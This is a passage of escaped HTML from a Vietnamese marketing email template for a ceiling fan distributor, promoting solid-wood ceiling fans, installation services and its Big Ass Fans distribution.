<\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"289\\\" style=\\\"width: 289px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-48p17\\\" style=\\\"max-width: 320px;min-width: 289.02px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764821104-abacus.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 289.02px;\\\" width=\\\"289.02\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"310\\\" style=\\\"width: 310px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-51p83\\\" style=\\\"max-width: 320px;min-width: 310.98px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_27\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px 0px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6 (SOLID WOOD)<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_28\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 0px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 22px; line-height: 30.8px;\\\"><strong>KI\\u1ec2U D\\u00c1NG HI\\u1ec6N \\u0110\\u1ea0I<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 13px; \\\"><strong>THO\\u1ea2I M\\u00c1I S\\u00c1NG T\\u1ea0O TU\\u1ef2 CH\\u1eccN M\\u00c0U<\\/strong><\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #0e0f13; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">Hi\\u1ec7n nay qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 t\\u1ef1 nhi\\u00ean qua x\\u1eed l\\u00fd ch\\u1ed1ng cong v\\u00eanh ho\\u1eb7c \\u0111\\u01b0\\u1ee3c x\\u1eed l\\u00fd th\\u00e0nh t\\u1ea5m nguy\\u00ean kh\\u1ed1i \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u ng\\u01b0\\u1eddi \\u01b0a chu\\u1ed9ng b\\u1edfi t\\u00ednh \\u0111\\u1ed9c \\u0111\\u00e1o v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi c\\u00e1c thi\\u1ebft k\\u1ebf n\\u1ed9i th\\u1ea5t hi\\u1ec7n nay. B\\u1edfi g\\u1ed7 t\\u1ef1 nhi\\u00ean (Solid Wood) \\u0111\\u01b0\\u1ee3c \\u01b0a chu\\u1ed9ng b\\u1edfi d\\u1ec5 ph\\u1ed1i m\\u00e0u v\\u00e0 tu\\u1ef3 ch\\u1ec9nh tone m\\u00e0u c\\u00f9ng v\\u1edbi c\\u00e1c n\\u1ed9i th\\u1ea5t nh\\u00e0 chung c\\u01b0\\/nh\\u00e0 ph\\u1ed1 c\\u00f3 thi\\u1ebft k\\u1ebf g\\u1ed7 \\u00f3c ch\\u00f3, g\\u1ed7 s\\u1ed3i... t\\u1ea1o \\u0111i\\u1ec3m nh\\u1ea5n cho c\\u0103n ph\\u00f2ng c\\u00e0ng th\\u00eam phong c\\u00e1ch.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_7\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-nha-o\\\" style=\\\"height:37px; v-text-anchor:middle; width:109px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-nha-o\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/du-an-da-trien-khai\\\" style=\\\"height:57px; v-text-anchor:middle; width:256px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#db1908\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/du-an-da-trien-khai\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #db1908; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:20px 40px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM D\\u1ef0 \\u00c1N L\\u1eaeP \\u0110\\u1eb6T<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #1b2a2f\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #1b2a2f;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; color: #f1c40f; line-height: 140%; text-align: left; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 20px; font-weight: 400; \\\">THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 17px; font-weight: 700; color: #2dc26b; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">L\\u01afU L\\u01af\\u1ee2NG KH\\u00d4NG KH\\u00cd, HI\\u1ec6U QU\\u1ea2 V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C C\\u01a0 QUAN L\\u00c0M VI\\u1ec6C<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f5f5f5; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi kinh nghi\\u1ec7m h\\u01a1n 10 n\\u0103m cung c\\u1ea5p l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n. Hi\\u1ec7n nay HGP (H\\u1ed3 Gia Ph\\u00e1t) l\\u00e0 \\u0111\\u1ea1i \\u0111i\\u1ec7n ph\\u00e2n ph\\u1ed1i \\u0111\\u1ed9c quy\\u1ec1n cho th\\u01b0\\u01a1ng hi\\u1ec7u Big Ass Fans, Haiku - th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t h\\u00e0ng \\u0111\\u1ea7u c\\u1ee7a Hoa K\\u1ef3 v\\u00e0 Tổ chức đào tạo WIT (China), WildMill (India) - d\\u00f2ng qu\\u1ea1t tr\\u1ea7n trang tr\\u00ed c\\u1ed5 \\u0111i\\u1ec3n - \\u0111a d\\u1ea1ng ki\\u1ec3u d\\u00e1ng &amp; k\\u00edch th\\u01b0\\u1edbc.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 18px; \\\">\\u1ee8ng d\\u1ee5ng Mua H\\u00e0ng\\u00a0<br \\/>\\u0110\\u1eb7t l\\u1ecbch l\\u1eafp \\u0111\\u1eb7t - b\\u1ea3o tr\\u00ec<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Source Sans Pro\',sans-serif; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <ul style=\\\"list-style-type: square;\\\">\\r\\n<li style=\\\"line-height: 19.6px;\\\">B\\u1ea1n c\\u1ea7n \\u0111\\u1eb7t h\\u00e0ng qu\\u1ea1t tr\\u1ea7n nhanh ?<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">B\\u1ea1n c\\u1ea7n s\\u1eed d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n chuy\\u00ean nghi\\u1ec7p?<\\/li>\\r\\n<li style=\\\"line-height: 19.6px;\\\">B\\u1ea1n c\\u1ea7n d\\u1ecbch v\\u1ee5 b\\u1ea3o d\\u01b0\\u1ee1ng, b\\u1ea3o tr\\u00ec qu\\u1ea1t tr\\u1ea7n?<\\/li>\\r\\n<\\/ul>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 